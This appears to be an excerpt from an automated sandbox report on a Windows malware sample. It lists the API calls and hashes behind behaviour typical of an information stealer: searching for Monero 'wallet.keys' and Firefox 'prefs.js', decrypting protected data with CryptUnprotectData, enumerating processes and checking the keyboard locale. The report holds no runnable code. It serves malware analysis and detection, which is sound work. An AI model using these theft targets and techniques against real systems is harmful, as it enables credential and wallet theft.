                        • Opcode Fuzzy Hash: a590de9cbaf31706e2c2da58ca28d00e777ae8d7d1a5fa8a14686798b7fcb53f
                        • Instruction Fuzzy Hash: 1F5147B2900219ABCB64EBB4DC45EEA73BCFB58300F408588B65DD6084DB75DB86CF52
                        APIs
                        • wsprintfA.USER32 ref: 0086ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0086ED55
                        • StrCmpCA.SHLWAPI(?,00881538), ref: 0086EDAB
                        • StrCmpCA.SHLWAPI(?,0088153C), ref: 0086EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0086F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 8a877be13600dd188e965ad739958e8d5c535b5f8b6567073a6efcb2bf1a3252
                        • Instruction ID: 9dc21b847abcc916228d03a2f554e77d3c511fdf5519c9e4a231b932d3fb8060
                        • Opcode Fuzzy Hash: 8a877be13600dd188e965ad739958e8d5c535b5f8b6567073a6efcb2bf1a3252
                        • Instruction Fuzzy Hash: 04E1C0719111185ADB58FB64DC91EEE7378FF94300F4081A9B51AE2096EF30AB8ACF53
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008815B8,00880D96), ref: 0086F71E
                        • StrCmpCA.SHLWAPI(?,008815BC), ref: 0086F76F
                        • StrCmpCA.SHLWAPI(?,008815C0), ref: 0086F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0086FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 9ca863b739d2dfecf96b2bb3fb9c18173af87b81aaa4f7b6731473416123887e
                        • Instruction ID: 6f1379a5f19ace771bd2c505f72ee232d58292e2bfdfb25a408f1f171d8e4e22
                        • Opcode Fuzzy Hash: 9ca863b739d2dfecf96b2bb3fb9c18173af87b81aaa4f7b6731473416123887e
                        • Instruction Fuzzy Hash: E9B112719001189BDB28FB68DC95AEE7379FF94300F4085A8A51ED6196EF30DB49CB93
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0088510C,?,?,?,008851B4,?,?,00000000,?,00000000), ref: 00861923
                        • StrCmpCA.SHLWAPI(?,0088525C), ref: 00861973
                        • StrCmpCA.SHLWAPI(?,00885304), ref: 00861989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00861D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00861DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00861E20
                        • FindClose.KERNEL32(000000FF), ref: 00861E32
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: f61c5e357d3ff107f7e8d90c9756503501e5fc4876f80a4d96e4e161b166c00b
                        • Instruction ID: 3a9cb403ad49e79ea4e5a2172452c645177b4467fe397a28e6694f99280a372d
                        • Opcode Fuzzy Hash: f61c5e357d3ff107f7e8d90c9756503501e5fc4876f80a4d96e4e161b166c00b
                        • Instruction Fuzzy Hash: 2F12E2719101189ADB59FB64CC95EEE7778FF94300F4081A9A52ED2095EF30AB89CF93
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00880C2E), ref: 0086DE5E
                        • StrCmpCA.SHLWAPI(?,008814C8), ref: 0086DEAE
                        • StrCmpCA.SHLWAPI(?,008814CC), ref: 0086DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0086E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: dfadb620f63ae2832f1dadbac726de76492200e6d2e23a7930a49f96dc149e78
                        • Instruction ID: 3e9233d546b7699e3123674aa482e1ffc958eaf968dbf9bf5a5a0c589b2cf9be
                        • Opcode Fuzzy Hash: dfadb620f63ae2832f1dadbac726de76492200e6d2e23a7930a49f96dc149e78
                        • Instruction Fuzzy Hash: 76F18F719141189ADB19FB64CC95EEE7378FF54300F4081A9A52EA2095EF34AB8ACF53
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008814B0,00880C2A), ref: 0086DAEB
                        • StrCmpCA.SHLWAPI(?,008814B4), ref: 0086DB33
                        • StrCmpCA.SHLWAPI(?,008814B8), ref: 0086DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0086DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 597a768e956846c3073575dc0ef26bed3a52f4f9f90d66c9b7919102d154935d
                        • Instruction ID: 809e59f66f5dbd6e2246d20c94ff500eecf5b09ffb0fe8e36e311bc6f467c909
                        • Opcode Fuzzy Hash: 597a768e956846c3073575dc0ef26bed3a52f4f9f90d66c9b7919102d154935d
                        • Instruction Fuzzy Hash: 3A913F72A0020497CB18FBB8DC969EE737DFBD4300F418568A95AD6185EF34DB098B93
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$w~$X?>$]l1$]l1$fkC$g$u}$sVGu$G;*
                        • API String ID: 0-1463576589
                        • Opcode ID: d27e1e8e3ae3442df0a85a50f21ca79775df0c671964d578be62a4f954c8990d
                        • Instruction ID: 9ac09cccba7c2676d3f55dd61d8894ce393afa83304e5e95bdf9221075b0b5f1
                        • Opcode Fuzzy Hash: d27e1e8e3ae3442df0a85a50f21ca79775df0c671964d578be62a4f954c8990d
                        • Instruction Fuzzy Hash: C6B217F350C2049FE304AE2DEC8567AFBE9EB94320F16893DEAC4C7744EA3558058697
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,008805AF), ref: 00877BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00877BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00877C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00877C62
                        • LocalFree.KERNEL32(00000000), ref: 00877D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 64161998585080adfb89118161d5867e6ff3ee537944ea1c916e305b16e7684f
                        • Instruction ID: 40be45f577a747a292bfc5b7802181f18670be27fa2bfae5862ba5cf650049d0
                        • Opcode Fuzzy Hash: 64161998585080adfb89118161d5867e6ff3ee537944ea1c916e305b16e7684f
                        • Instruction Fuzzy Hash: D5416071940118ABCB24DB94DC89FEEB7B4FF58700F108199E11DA2284DB346F85CFA2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 11y-$7*O{$Qz-$b[n$k Rk$1Y:$><
                        • API String ID: 0-350295712
                        • Opcode ID: a583dd45a5b847c5af47c94b5b36afa5a9644823866337c44f6d87ea7b764fb8
                        • Instruction ID: 5fcc5e95ed41aeede73b049506ca1655f76ed022ccea9c4f79044f7ffe8a82cc
                        • Opcode Fuzzy Hash: a583dd45a5b847c5af47c94b5b36afa5a9644823866337c44f6d87ea7b764fb8
                        • Instruction Fuzzy Hash: 40B219F360C214AFE3046E29EC8567AF7E9EF94720F1A493DEAC4D3744EA3558018697
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00880D73), ref: 0086E4A2
                        • StrCmpCA.SHLWAPI(?,008814F8), ref: 0086E4F2
                        • StrCmpCA.SHLWAPI(?,008814FC), ref: 0086E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0086EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 73674e41a997595397e2bd92c1ac95b1b6bf30508561a68d8a165bf932cccdf5
                        • Instruction ID: 41072a560dcf0e100233885948cfc2939fd5190b344bcc255897bff3cf5d7e47
                        • Opcode Fuzzy Hash: 73674e41a997595397e2bd92c1ac95b1b6bf30508561a68d8a165bf932cccdf5
                        • Instruction Fuzzy Hash: 801220719101149ADB1CFB68DC96EEE7378FB94300F4081A8A52ED6195EF349F49CB93
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: K%]$QYv{$R'3$_W^t$aw$cZ<
                        • API String ID: 0-4190752915
                        • Opcode ID: 44659b7301c60ecddf48f4e6df65a720049d785483f3af690fde2e8a5252380b
                        • Instruction ID: 297c362cd4ecab06ac93767d8a56d8dc58ab48194db1b50469bcd4f6b1c2bb12
                        • Opcode Fuzzy Hash: 44659b7301c60ecddf48f4e6df65a720049d785483f3af690fde2e8a5252380b
                        • Instruction Fuzzy Hash: DFB2E6F360C2049FE304AE2DEC4567ABBE9EFD4620F1A453DEAC4C3744EA3598458697
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0086C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0086C87C
                        • lstrcat.KERNEL32(?,00880B46), ref: 0086C943
                        • lstrcat.KERNEL32(?,00880B47), ref: 0086C957
                        • lstrcat.KERNEL32(?,00880B4E), ref: 0086C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: ab6d47346b3200df05926286e93ee70ac55b5255996dc00d14a2e08a28de4ceb
                        • Instruction ID: f3a859fa1d9836835a67c8f978c1ddb3a8e7a981eac9deb16d973a3d0c996447
                        • Opcode Fuzzy Hash: ab6d47346b3200df05926286e93ee70ac55b5255996dc00d14a2e08a28de4ceb
                        • Instruction Fuzzy Hash: 5D416DB590421ADBDB10DFA4DD89BFEBBB8FB48304F1041A8E509A72C0D7745A85CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0086724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00867254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00867281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 008672A4
                        • LocalFree.KERNEL32(?), ref: 008672AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: d38bddb4c45b5fcf04ee08d6abcc7e071f98bddfcd24cc7e70c96ee7be33bf19
                        • Instruction ID: 664ca4cd8ed6e224aa8aae4c19457ca50d7acfeb627f5ceaf811563a98242a4f
                        • Opcode Fuzzy Hash: d38bddb4c45b5fcf04ee08d6abcc7e071f98bddfcd24cc7e70c96ee7be33bf19
                        • Instruction Fuzzy Hash: AD01EDB5A40209BBDB50DFD4CD45F9E77B8EB48B04F104154FB05EA2C0D774AA01CBA5
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0087961E
                        • Process32First.KERNEL32(00880ACA,00000128), ref: 00879632
                        • Process32Next.KERNEL32(00880ACA,00000128), ref: 00879647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0087965C
                        • CloseHandle.KERNEL32(00880ACA), ref: 0087967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 184770efd06b2032b92b9b19264be18f7f94fb0910d1c3926e48d933da0c35b3
                        • Instruction ID: 64e312b757c83553b34a472c577e0f3ddc69cc8eea6696e2f0be689ae8700d9c
                        • Opcode Fuzzy Hash: 184770efd06b2032b92b9b19264be18f7f94fb0910d1c3926e48d933da0c35b3
                        • Instruction Fuzzy Hash: 5F01E9B5A00209ABCB15DFA5C948BEEB7F8FB58300F108288E94AD7280D7349A45CF51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Wuvs$st^$~~_$L/v
                        • API String ID: 0-798858268
                        • Opcode ID: bf97176a308fd7ed4e9170a56a09b632410113d38fbb5d77958919c721573da2
                        • Instruction ID: 56dd831464fde9281616533545f9c3f2d718058092949faf8925260fbfef9daa
                        • Opcode Fuzzy Hash: bf97176a308fd7ed4e9170a56a09b632410113d38fbb5d77958919c721573da2
                        • Instruction Fuzzy Hash: 38B2F6F3A0C204AFE304AE2DEC8577AF7E9EF94620F1A453DEAC4C3744E63558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !|sq$BumY$H9r$uvw^
                        • API String ID: 0-2612479984
                        • Opcode ID: cd588d96752fe09d249f2d7080701e24dbad68b075b522130372753a0a73efd9
                        • Instruction ID: 1101aa82ab8b44bfa2af3f4d79aa6e49e4dbfd860e352af2380e836e5450aacd
                        • Opcode Fuzzy Hash: cd588d96752fe09d249f2d7080701e24dbad68b075b522130372753a0a73efd9
                        • Instruction Fuzzy Hash: 29B2F5F360C204AFE704AE29EC8567AFBE9EF94720F16493DE6C4C3744E63558418697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !s~+$*@?$u7?$&u
                        • API String ID: 0-1056303262
                        • Opcode ID: 9649fd8e0379e8eb9f947764f8547678bcfc8022ccdd97823d7541dbd22ae4b5
                        • Instruction ID: 0695a2b2ad6eb5ec83254d21a1b6151da27ae4fe82e64b8fd41a553c13e1c912
                        • Opcode Fuzzy Hash: 9649fd8e0379e8eb9f947764f8547678bcfc8022ccdd97823d7541dbd22ae4b5
                        • Instruction Fuzzy Hash: ECA23AF3A0C204AFE7046E2DEC8567AFBE9EF94360F16493DEAC5C3344E93558058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ++}v$2eo$K}?M$L^
                        • API String ID: 0-2310634233
                        • Opcode ID: df6d283c138aabc6acbc3eafa9e1356c80b2c040f2ee7d4cc698e2d1ef63bf77
                        • Instruction ID: e98c0e56dc6bc1241e2099f32d1e67e7f3a26ba73988a62a0bb21f7d17049e5f
                        • Opcode Fuzzy Hash: df6d283c138aabc6acbc3eafa9e1356c80b2c040f2ee7d4cc698e2d1ef63bf77
                        • Instruction Fuzzy Hash: C6B2C2F260C2009FE708AE29EC8567AFBE5EF94720F16493DEAC5C3744EA3558418797
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;5C?$SA$[(tv$B;
                        • API String ID: 0-1544452065
                        • Opcode ID: 826246aee8b69dc1a54452a29b4d4b8f512216323a21d375aba59639a4d93280
                        • Instruction ID: 301d491a205dc196df85af2c18ee2dd7110ec46bd4bd3ecb26809d92cf20d7f9
                        • Opcode Fuzzy Hash: 826246aee8b69dc1a54452a29b4d4b8f512216323a21d375aba59639a4d93280
                        • Instruction Fuzzy Hash: 30923AF360C2009FE705AE29DC8567AB7E5EF94320F1A853DEAC5C3744EA3598058697
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008805B7), ref: 008786CA
                        • Process32First.KERNEL32(?,00000128), ref: 008786DE
                        • Process32Next.KERNEL32(?,00000128), ref: 008786F3
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • CloseHandle.KERNEL32(?), ref: 00878761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 99d795aa081f952da4419d6a83eebd56b7260504a438dbdf590fe8dade146704
                        • Instruction ID: e6a7247b2f4171053037571e1bd9af21e4bc44b1d1c706de1f2d714ed24c43ea
                        • Opcode Fuzzy Hash: 99d795aa081f952da4419d6a83eebd56b7260504a438dbdf590fe8dade146704
                        • Instruction Fuzzy Hash: A6315071901118EBCB18DF94CC45FEEB778FB45700F1081A9A51EE2194DB34AA45CFA2
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,00865184,40000001,00000000,00000000,?,00865184), ref: 00878EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 88ab0878ef3aaa84ca77a2b39864a3e1288aef8876f8e3a1659ef64afa4c17be
                        • Instruction ID: c5ccdd1730b768b41e12a76f03427213b7a39cb99679b3193ca9882ff03394d5
                        • Opcode Fuzzy Hash: 88ab0878ef3aaa84ca77a2b39864a3e1288aef8876f8e3a1659ef64afa4c17be
                        • Instruction Fuzzy Hash: 03110671240209EFDB00CFA4E888FAA37A9FF8A714F10D448F919CB254DB35E881DB61
                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869AEF
                        • LocalAlloc.KERNEL32(00000040,?,?,?,00864EEE,00000000,?), ref: 00869B01
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00864EEE,00000000,00000000), ref: 00869B2A
                        • LocalFree.KERNEL32(?,?,?,?,00864EEE,00000000,?), ref: 00869B3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptLocalString$AllocFree
                        • String ID:
                        • API String ID: 4291131564-0
                        • Opcode ID: c6710bc813351d657423686e1f01ec57f63117c05ecd32f8ca7c0303ace06805
                        • Instruction ID: 8a8a88926457c311d95566f1452f08e071a9231b167e1cf2de52f3941c8cea1e
                        • Opcode Fuzzy Hash: c6710bc813351d657423686e1f01ec57f63117c05ecd32f8ca7c0303ace06805
